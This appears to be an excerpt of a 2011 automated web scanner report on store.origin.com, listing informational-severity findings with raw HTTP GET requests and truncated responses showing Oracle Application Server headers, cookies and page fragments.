GET /store/ea/en_US Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: VISITOR_ID=971D4E8DF |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:35:33 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 39947 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926133816:NODE ...[SNIP]... <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script src="//drh1.img <script type="text/javascript" src="//drh1.img <script type="text/javascript" src="//drh.img.digit ...[SNIP]... <!--!/esi:include --> <script src="//drh.img.digit ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store/ea/en_US/pd |
GET /store/ea/en_US/pd Host: store.origin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://store.origin.com Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:25:39 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app41 Content-Length: 75477 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308925539845:NODE ...[SNIP]... <link rel="canonical" href="http://store.origin <script src="//drh1.img <script type="text/javascript" src="//drh1.img <script type="text/javascript" src="//drh.img.digit ...[SNIP]... </script> <script src="//drh1.img <script src="//drh.img.digit ...[SNIP]... <!--!/esi:include --> <script src="//drh.img.digit ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store/ea/home/ |
GET /store/ea/home/ HTTP/1.1 Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:36:24 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 64866 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926184850:NODE ...[SNIP]... <link href="http://store.origin <script src="//drh1.img <script type="text/javascript" src="//drh1.img ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... </script> <script src="//drh.img.digit ...[SNIP]... </script> <script type="text/javascript" src="//drh.img.digit ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /DRHM/Storefront/Site/ea |
GET /DRHM/Storefront/Site/ea Host: store.origin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://web-static.ea.com |
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 23 Jun 2016 20:09:22 GMT ETag: "124a-4cdd6bd8" Content-Type: application/x-javascript Last-Modified: Fri, 12 Nov 2010 16:31:20 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 4682 Date: Fri, 24 Jun 2011 14:09:22 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app45 Accept-Ranges: bytes Set-Cookie: BIGipServerp-drh FSR.surveydefs = [{ name: 'browse', invite: { when: 'onentry' }, pop: { when: 'later' }, criteria: { sp: 3.5, lf: 3 }, inclu ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /DRHM/Storefront/Site/ea |
GET /DRHM/Storefront/Site/ea Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: store.origin.com |
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 02 Jun 2016 15:31:17 GMT ETag: "184-4dbae12a" Content-Type: image/jpeg Last-Modified: Fri, 29 Apr 2011 16:02:50 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 388 Date: Fri, 03 Jun 2011 09:31:17 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb03@dc2app50 Accept-Ranges: bytes Set-Cookie: BIGipServerp-drh ......JFIF.....d.d..... ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://store.origin.com |
Path: | /store |
GET /store?Action=DisplayPage Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: VISITOR_ID=971D4E8DF Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:36:13 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 26163 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <!-- REQUEST ID: TIME=1308926173482:NODE ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://store.origin.com |
Path: | /DRHM/Storefront/Site/ea |
GET /DRHM/Storefront/Site/ea Host: store.origin.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: VISITOR_ID=971D4E8DF |
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 02 Jun 2016 14:40:03 GMT ETag: "57e-4756dc38" Content-Type: text/plain Last-Modified: Wed, 05 Dec 2007 17:13:28 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Content-Length: 1406 Date: Fri, 03 Jun 2011 08:40:03 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Accept-Ranges: bytes ..............h.......(.. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://store.origin.com |
Path: | /store |
GET /store?Action=DisplayPage Host: store.origin.com Proxy-Connection: keep-alive Referer: http://store.origin.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerp-drh |
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10 Date: Fri, 24 Jun 2011 14:35:37 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app53 Content-Length: 2389 <!-- REQUEST ID: TIME=1308926137372:NODE <!--!esi:include src="/store?Action ...[SNIP]... |